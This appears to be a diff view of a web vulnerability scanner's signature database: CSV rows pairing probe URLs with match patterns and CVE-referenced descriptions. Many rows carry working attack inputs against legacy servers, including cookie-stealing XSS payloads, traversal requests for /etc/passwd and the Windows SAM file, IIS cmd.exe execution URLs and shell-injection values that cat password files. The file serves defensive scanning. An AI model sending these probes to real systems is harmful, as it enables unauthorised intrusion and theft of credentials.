"003233","5098","4","/sysuser/docmgr/info.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3232 "003234","5098","4","/sysuser/docmgr/mkdir.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3233 "003235","5098","4","/sysuser/docmgr/rename.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3234 "003236","5098","4","/sysuser/docmgr/search.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3235 "003237","5098","4","/sysuser/docmgr/sendmail.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3236 "003238","5098","4","/sysuser/docmgr/template.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3237 "003239","5098","4","/sysuser/docmgr/update.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3238 "003240","5098","4","/sysuser/docmgr/vccheckin.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3239 "003241","5098","4","/sysuser/docmgr/vccreate.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3240 "003242","5098","4","/sysuser/docmgr/vchist.stm?path=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3241 "003243","5099","4","/sysuser/docmgr/edit.stm?name=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3242 "003244","5099","4","/sysuser/docmgr/ieedit.stm?name=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3243 "003245","5099","4","/sysuser/docmgr/info.stm?name=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3244 "003246","5099","4","/sysuser/docmgr/rename.stm?name=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3245 "003247","5099","4","/sysuser/docmgr/sendmail.stm?name=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3246 "003248","5099","4","/sysuser/docmgr/update.stm?name=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3247 "003249","5099","4","/sysuser/docmgr/vccheckin.stm?name=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3248 "003250","5099","4","/sysuser/docmgr/vccreate.stm?name=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3249 "003251","5099","4","/sysuser/docmgr/vchist.stm?name=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3250 "003252","5100","4","@CGIDIRStestcgi.exe?<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3251 "003253","5101","4","@CGIDIRSenviron.pl?param1=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3252 "003254","5102","4","/syshelp/stmex.stm?foo=123&bar=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3253 "003255","5102","4","/syshelp/stmex.stm?foo=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","&bar=456","" 3254 "003256","5103","4","/syshelp/cscript/showfunc.stm?func=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3255 "003257","5104","4","/syshelp/cscript/showfncs.stm?pkg=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3256 "003258","5105","4","/syshelp/cscript/showfnc.stm?pkg=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3257 "003259","5106","4","/netutils/ipdata.stm?ipaddr=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3258 "003260","5107","4","/netutils/findata.stm?host=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3259 "003261","5107","4","/netutils/findata.stm?user=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3260 "003262","5108","4","/sysuser/docmgr/search.stm?query=<script>alert(document.cookie)</script>","GET","<script>alert\(document\.cookie\)<\/script>","","","","","Sambar Server default script is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3261 3261 "003263","514","8","/isapi/tstisapi.dll","GET","Pi3web","","","","","The test tstisapi.dll is available and can allow attackers to execute commands remotely.","","" 3262 3262 "003264","524","7","@CGIDIRSbb_smilies.php?user=MToxOjE6MToxOjE6MToxOjE6Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZAAK","GET","root:","","","","","PHP-Nuke is vulnerable to a remote file retrieval vuln. It should be upgraded to the latest version. CVE-2001-0320","","" … … 3270 3270 "003272","543","7","/opendir.php?/etc/passwd","GET","root:","","","","","This PHP-Nuke CGI allows attackers to read any file on the web server. CVE-2001-0321","","" 3271 3271 "003273","543","7","/opendir.php?requesturl=/etc/passwd","GET","root:","","","","","This PHP-Nuke CGI allows attackers to read any file on the web server. CVE-2001-0321","","" 3272 "003274","5457","4","/webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD","GET","<script>alert ('Vulnerable')</script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3273 "003275","5457","4","@CGIDIRScvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD","GET","<script>alert ('Vulnerable')</script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3274 "003276","5458","4","/webtools/bonsai/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3275 "003277","5458","4","/webtools/bonsai/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week","GET","<script>alert ('Vulnerable')</script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3276 "003278","5458","4","@CGIDIRScvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3277 "003279","5458","4","@CGIDIRScvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week","GET","<script>alert ('Vulnerable')</script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3278 "003280","5459","4","/webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3279 "003281","5459","4","/webtools/bonsai/cvslog.cgi?file=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3280 "003282","5459","4","@CGIDIRScvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3281 "003283","5459","4","@CGIDIRScvslog.cgi?file=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3282 "003284","5460","4","/webtools/bonsai/cvsblame.cgi?file=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3283 "003285","5460","4","@CGIDIRScvsblame.cgi?file=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3284 "003286","5461","4","/webtools/bonsai/showcheckins.cgi?person=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3285 "003287","5461","4","@CGIDIRSshowcheckins.cgi?person=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3272 "003274","5457","4","/webtools/bonsai/cvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3273 "003275","5457","4","@CGIDIRScvsqueryform.cgi?cvsroot=/cvsroot&module=<script>alert('Vulnerable')</script>&branch=HEAD","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3274 "003276","5458","4","/webtools/bonsai/cvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3275 "003277","5458","4","/webtools/bonsai/cvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3276 "003278","5458","4","@CGIDIRScvsquery.cgi?branch=<script>alert('Vulnerable')</script>&file=<script>alert(document.domain)</script>&date=<script>alert(document.domain)</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3277 "003279","5458","4","@CGIDIRScvsquery.cgi?module=<script>alert('Vulnerable')</script>&branch=&dir=&file=&who=<script>alert(document.domain)</script>&sortby=Date&hours=2&date=week","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3278 "003280","5459","4","/webtools/bonsai/cvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3279 "003281","5459","4","/webtools/bonsai/cvslog.cgi?file=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3280 "003282","5459","4","@CGIDIRScvslog.cgi?file=*&rev=&root=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3281 "003283","5459","4","@CGIDIRScvslog.cgi?file=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3282 "003284","5460","4","/webtools/bonsai/cvsblame.cgi?file=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3283 "003285","5460","4","@CGIDIRScvsblame.cgi?file=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3284 "003286","5461","4","/webtools/bonsai/showcheckins.cgi?person=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3285 "003287","5461","4","@CGIDIRSshowcheckins.cgi?person=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Bonsai is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3286 3286 "003288","6659","4","/JUNK(223)<font%20size=50>DEFACED<!--//--","GET","<font size=50>DEFACED<","","","not found","","MyWebServer 1.0.2 is vulnerable to HTML injection. Upgrade to a later version.","","" 3287 3287 "003289","5523","d","/MWS/HandleSearch.html?searchTarget=test&B1=Submit","GET","200","","","","","MyWebServer 1.0.2 may be vulnerable to a buffer overflow (untested). Upgrade to a later version if 990b of searched data crashes the server.","","" … … 3297 3297 "003299","556","8","/rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug that allows commands to be executed on the system. CVE-2001-0333. BID-2708.","","" 3298 3298 "003300","556","8","/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug that allows commands to be executed on the system. CVE-2001-0333. BID-2708.","","" 3299 "003301","556","8","/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver","GET"," [Version]","","","","","IIS is vulnerable to a double-decode bug that allows commands to be executed on the system. CVE-2001-0333. BID-2708.","",""3299 "003301","556","8","/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver","GET","\[Version\]","","","","","IIS is vulnerable to a double-decode bug that allows commands to be executed on the system. CVE-2001-0333. BID-2708.","","" 3300 3300 "003302","556","8","/_vti_bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir","GET","<DIR>","","","","","IIS is vulnerable to a double-decode bug that allows commands to be executed on the system. CVE-2001-0333. BID-2708.","","" 3301 3301 "003303","562","3","/server-info","GET","200","Server Information","","","","This gives a lot of Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts.","","" 3302 3302 "003304","5689","4","@CGIDIRSnamazu.cgi","GET","200","","","","","Namazu search engine found. Vulnerable to XSS attacks (fixed 2001-11-25). Attacker could write arbitrary files outside docroot (fixed 2000-01-26). CA-2000-02.","","" 3303 "003305","5692","3","/oekaki/","GET"," .conf","","","","","The PaintBBS Server may allow unauthorized access to the config files.","",""3303 "003305","5692","3","/oekaki/","GET","\.conf","","","","","The PaintBBS Server may allow unauthorized access to the config files.","","" 3304 3304 "003306","5709","3","/.nsconfig","GET","200","","","","","Contains authorization information","","" 3305 3305 "003307","5709","3","@CGIDIRS.nsconfig","GET","200","","","","","Contains authorization information","","" 3306 "003308","582","2","/?D=A","GET"," index of\/","","","","","Apache allows directory listings by requesting.","",""3307 "003309","582","2","/?N=D","GET"," index of\/","","","","","Apache allows directory listings by requesting.","",""3308 "003310","582","2","/?S=A","GET"," index of\/","","","","","Apache allows directory listings by requesting.","",""3309 "003311","582","23","/?M=A","GET"," index of\/","","","","","Apache allows directory listings. Upgrade Apache or disable directory indexing.","",""3310 "003312","583","7","/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1","GET","Reply from 127 .0.0.1","","","","","Specially formatted strings allow command execution. Upgrade to version 1.15 or higher. CVE-2000-0011.","",""3306 "003308","582","2","/?D=A","GET","[Ii]ndex [Oo]f \\\/","","","","","Apache allows directory listings by requesting.","","" 3307 "003309","582","2","/?N=D","GET","[Ii]ndex [Oo]f \\\/","","","","","Apache allows directory listings by requesting.","","" 3308 "003310","582","2","/?S=A","GET","[Ii]ndex [Oo]f \\\/","","","","","Apache allows directory listings by requesting.","","" 3309 "003311","582","23","/?M=A","GET","[Ii]ndex [Oo]f \\\/","","","","","Apache allows directory listings. Upgrade Apache or disable directory indexing.","","" 3310 "003312","583","7","/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%49%4E%4E%54%2F%73%79%73%74%65%6D%33%32%2Fping.exe%20127.0.0.1","GET","Reply from 127\.0\.0\.1","","","","","Specially formatted strings allow command execution. Upgrade to version 1.15 or higher. CVE-2000-0011.","","" 3311 3311 "003313","583","7","/cgi-bin/%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%2E%2E%2F%57%69%6E%64%6F%77%73%2Fping.exe%20127.0.0.1","GET","200","","","","","Specially formatted strings allow command execution. Upgrade to version 1.15 or higher. CVE-2000-0011.","","" 3312 3312 "003314","596","3","/dc/auth_data/auth_user_file.txt","GET","200","","","","","The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.","","" … … 3314 3314 "003316","596","3","/dcshop/auth_data/auth_user_file.txt","GET","200","","","","","The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.","","" 3315 3315 "003317","596","3","/dcshop/orders/orders.txt","GET","200","","","","","The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.","","" 3316 "003318","635","8","@CGIDIRSshop.pl/page=;cat%20shop.pl|","GET","\ /perl","","","","","Shopping Cart (Hassan) allows execution of remote commands. CVE-2001-0985.","",""3316 "003318","635","8","@CGIDIRSshop.pl/page=;cat%20shop.pl|","GET","\\\/perl","","","","","Shopping Cart (Hassan) allows execution of remote commands. CVE-2001-0985.","","" 3317 3317 "003319","641","7","/cgi-shop/view_item?HTML_FILE=../../../../../../../../../../etc/passwd%00","GET","root:","","","","","This CGI allows reading of remote files. CVE-2001-1019.","","" 3318 3318 "003320","644","3","/.FBCIndex","GET","Bud2","","","","","This file on OSX contains the source of the files in the directory. http://www.securiteam.com/securitynews/5LP0O005FS.html","","" 3319 3319 "003321","645","7","@CGIDIRSshopplus.cgi?dn=domainname.com&cartid=%CARTID%&file=;cat%20/etc/passwd|","GET","root:","","","","","ShopPlus Cart allows arbitrary command execution. CVE-2001-0992.","","" 3320 "003322","646","8","@CGIDIRSeshop.pl/seite=;cat%20eshop.pl|","GET","\ /perl","","","","","This CGI allows attackers to execute commands on the remote server. CVE-2001-1014.","",""3321 "003323","6659","4","/JUNK(223)<font%20size=50><script>alert(11)</script><!--//--","GET","<script>alert (11)</script>","","","","","MyWebServer 1.0.2 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3320 "003322","646","8","@CGIDIRSeshop.pl/seite=;cat%20eshop.pl|","GET","\\\/perl","","","","","This CGI allows attackers to execute commands on the remote server. CVE-2001-1014.","","" 3321 "003323","6659","4","/JUNK(223)<font%20size=50><script>alert(11)</script><!--//--","GET","<script>alert\(11\)<\/script>","","","","","MyWebServer 1.0.2 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3322 3322 "003324","6661","7","@CGIDIRSion-p.exe?page=c:\winnt\repair\sam","GET","200","","","","","Ion-P allows remote file retrieval.","","" 3323 3323 "003325","6661","7","@CGIDIRSion-p?page=../../../../../etc/passwd","GET","root:","","","","","Ion-P allows remote file retrieval.","","" 3324 3324 "003326","6663","7","/..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini","GET","boot loader","","","","","GoAhead Web Server 2.1 is vulnerable to arbitrary file retrieval, upgrade to the latest version.","","" 3325 "003327","6663","7","/..%5C..%5C..%5C..%5C..%5C..%5C/winnt/win.ini","GET"," [windows]","[fonts]","","","","GoAhead Web Server 2.1 is vulnerable to arbitrary file retrieval.","",""3325 "003327","6663","7","/..%5C..%5C..%5C..%5C..%5C..%5C/winnt/win.ini","GET","\[windows\]","\[fonts\]","","","","GoAhead Web Server 2.1 is vulnerable to arbitrary file retrieval.","","" 3326 3326 "003328","6666","6","/cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html","GET","200","","","","","HP Instant TopTools GoAhead WebServer hpnst.exe may be vulnerable to a DoS.","","" 3327 3327 "003329","6670","3","/applist.asp","GET","200","","","","","Citrix server may allow remote users to view applications installed without authenticating.","","" … … 3330 3330 "003332","6672","a","/_layouts/settings.htm","GET","200","","","","","Microsoft SharePoint Portal and Team Services vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x. Bugtraq 03-11-19 post by arkanian@hacker.am","","" 3331 3331 "003333","6672","a","/_layouts/userinfo.htm","GET","200","","","","","Microsoft SharePoint Portal and Team Services vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x. Bugtraq 03-11-19 post by arkanian@hacker.am","","" 3332 "003334","6673","8","@CGIDIRSindex.pl","GET","Powered By WebGUI 4 .6.8","","","","","WebGUI version 4.6.8, according to the documentation, may allow arbitrary code execution. http://freshmeat.net/users/rizen/.","",""3332 "003334","6673","8","@CGIDIRSindex.pl","GET","Powered By WebGUI 4\.6\.8","","","","","WebGUI version 4.6.8, according to the documentation, may allow arbitrary code execution. http://freshmeat.net/users/rizen/.","","" 3333 3333 "003335","6694","3","/.DS_Store","GET","Bud1","","","","","Apache on Mac OSX will serve the .DS_Store file, which contains sensitive information. Configure Apache to ignore this file or upgrade to a newer version.","","" 3334 3334 "003336","6695","3","@CGIDIRSrwcgi60","GET","200","","","","","Oracle report server reveals system information without authorization. See Oracle note 133957.1 - Restricting Access to the Reports Server Environment and Output","","" 3335 3335 "003337","6695","3","@CGIDIRSrwcgi60/showenv","GET","200","","","","","Oracle report server reveals system information without authorization. See Oracle note 133957.1 - Restricting Access to the Reports Server Environment and Output","","" 3336 "003338","6696","8","@CGIDIRSindex.pl","GET","Powered By WebGUI 4 .6.9","","","","","WebGUI version 4.6.9 has a 'very obsure and unlikely security hole' according to the documentation. .","",""3337 "003339","6697","3","@CGIDIRSindex.pl","GET","Powered By WebGUI 4 .5.0","","","","","WebGUI version 4.5.0 according to the documentation, a user could view collateral data of a wobject if the URL is known. http://freshmeat.net/users/rizen/.","",""3336 "003338","6696","8","@CGIDIRSindex.pl","GET","Powered By WebGUI 4\.6\.9","","","","","WebGUI version 4.6.9 has a 'very obsure and unlikely security hole' according to the documentation. .","","" 3337 "003339","6697","3","@CGIDIRSindex.pl","GET","Powered By WebGUI 4\.5\.0","","","","","WebGUI version 4.5.0 according to the documentation, a user could view collateral data of a wobject if the URL is known. http://freshmeat.net/users/rizen/.","","" 3338 3338 "003340","6698","8","@CGIDIRSclassifieds/classifieds.cgi","GET","200","","","","","Mike's Classifieds CGI contains a bug that allows arbitrary command execution on the server (untested), see http://freshmeat.net/projects/myclassifieds/","","" 3339 3339 "003341","6699","8","@CGIDIRScalendar/index.cgi","GET","200","","","","","Mike's Calendar CGI contains a bug that allows arbitrary command execution (version 1.4), see http://freshmeat.net/projects/mycalendar/","","" … … 3347 3347 "003349","684","4","@CGIDIRSPRN/../../../../../../../../../WINNT/system32/ipconfig.exe","GET","IP Configuration","","","","","Alchemy Eye and Alchemy Network Monitor for Windows allow attackers to execute arbitrary commands.","","" 3348 3348 "003350","694","7","/phprocketaddin/?page=../../../../../../../../../../etc/passwd","GET","root:","","","","","The PHP-Nuke Rocket add-in is vulnerable to file traversal, allowing an attacker to view any file on the host.","","" 3349 "003351","698","4","@CGIDIRSstore/agora.cgi?cart_id=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Agora.cgi is vulnerable to Cross Site Scripting (XSS), CVE-2001-1199, CA-2000-02.","",""3349 "003351","698","4","@CGIDIRSstore/agora.cgi?cart_id=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Agora.cgi is vulnerable to Cross Site Scripting (XSS), CVE-2001-1199, CA-2000-02.","","" 3350 3350 "003352","7","6","/iissamples/exair/howitworks/Code.asp","GET","200","","","","","Scripts within the Exair package on IIS 4 can be used for a DoS against the server. CVE-1999-0449. BID-193.","","" 3351 3351 "003353","7","6","/iissamples/exair/howitworks/Codebrw1.asp","GET","200","","","","","This is a default IIS script/file which should be removed, it may allow a DoS against the server. CVE-1999-0738. MS99-013. CVE-1999-0449. BID-193.","","" 3352 "003354","7","7","/msadc/Samples/selector/showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini","GET"," [fonts]","","","","","This allows attackers to read arbitrary files on the host. CVE-1999-0736. MS99-013.","",""3353 "003355","701","4","/pls/dadname/htp.print?cbuf=<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Oracle 9iAS is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3354 "003356","701","4","/pls/help/<script>alert('Vulnerable')</script>","GET","<script>alert ('Vulnerable')</script>","","","","","Oracle 9iAS is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","",""3352 "003354","7","7","/msadc/Samples/selector/showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini","GET","\[fonts\]","","","","","This allows attackers to read arbitrary files on the host. CVE-1999-0736. MS99-013.","","" 3353 "003355","701","4","/pls/dadname/htp.print?cbuf=<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Oracle 9iAS is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3354 "003356","701","4","/pls/help/<script>alert('Vulnerable')</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","Oracle 9iAS is vulnerable to Cross Site Scripting (XSS). CA-2000-02.","","" 3355 3355 "003357","707","3","/demo/ojspext/events/globals.jsa","GET","event:application_OnStart","","","","","Oracle 9iAS allows .jsa files to be retrieved, which may contain sensitive information.","","" 3356 3356 "003358","707","3","/globals.jsa","GET","200","","","","","Oracle globals.jsa file","","" … … 3369 3369 "003371","724","8","/ans/ans.pl?p=../../../../../usr/bin/id|&blah","GET","uid","","","","","Avenger's News System allows commands to be issued remotely.","","" 3370 3370 "003372","761","8","@CGIDIRScsSearch.cgi?command=savesetup&setup=`cat%20/etc/passwd`","GET","root:","","","","","csSearch (http://www.cgiscript.net/) has a major flaw that allows Perl to be executed remotely. Upgrade to a version higher than 2.3. CVE-2002-0495.","","" 3371 "003373","768","3","/?\"><script>alert('Vulnerable');</script>","GET","<script>alert ('Vulnerable')</script>","","","","","IIS is vulnerable to Cross Site Scripting (XSS). See MS02-018, CVE-2002-0075, SNS-49, CA-2002-09","",""3372 "003374","3341","3","/JUNK(10)abcd.html","GET"," + displayresult+","","","","","The IIS 4.0, 5.0 and 5.1 server may be vulnerable to Cross Site Scripting (XSS) in redirect error messages.","",""3371 "003373","768","3","/?\"><script>alert('Vulnerable');</script>","GET","<script>alert\('Vulnerable'\)<\/script>","","","","","IIS is vulnerable to Cross Site Scripting (XSS). See MS02-018, CVE-2002-0075, SNS-49, CA-2002-09","","" 3372 "003374","3341","3","/JUNK(10)abcd.html","GET","\+ displayresult \+","","","","","The IIS 4.0, 5.0 and 5.1 server may be vulnerable to Cross Site Scripting (XSS) in redirect error messages.","","" 3373 3373 "003375","782","6","/iissamples/exair/howitworks/codebrws.asp","GET","ASP Source code browser","","","","","This is a default IIS script/file that should be removed. It may allow a DoS against the server or a DoS. XF-2383 BID-0167.","","" 3374 3374 